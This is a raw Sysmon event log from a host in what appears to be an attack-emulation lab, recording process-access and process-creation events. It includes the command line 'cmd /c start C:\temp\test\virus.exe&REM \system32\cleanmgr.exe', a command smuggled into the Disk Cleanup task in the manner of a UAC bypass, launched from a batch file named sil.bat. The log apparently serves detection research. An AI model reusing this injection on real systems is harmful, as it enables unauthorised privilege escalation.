10341000x80000000000000001051016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.260{466BC892-F5DF-60EB-7A7D-00000000CF01}11887452C:\Windows\System32\cmd.exe{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\temp\test\virus.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+1b13|C:\Windows\System32\cmd.exe+c9d2|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.261{466BC892-F5DF-60EB-7E7D-00000000CF01}9640C:\Temp\test\virus.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\temp\test\virus.exe C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-19BC-780000000000}0x78bc193MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.execmd /c start C:\temp\test\virus.exe&REM \system32\cleanmgr.exe /autoclean /d C: 10341000x80000000000000001051003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.244{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.244{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.244{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.244{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.230{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.230{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.230{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.213{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.213{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.213{466BC892-F5DF-60EB-7C7D-00000000CF01}63284804C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-7A7D-00000000CF01}1188C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.212{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.211{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.210{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.207{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.206{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.206{466BC892-F5DF-60EB-7D7D-00000000CF01}1328C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 3 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.204{466BC892-0664-60E8-6503-00000000CF01}40245356C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7B7D-00000000CF01}8008C:\Windows\system32\cleanmgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:19.202{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DF-60EB-7C7D-00000000CF01}6328C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 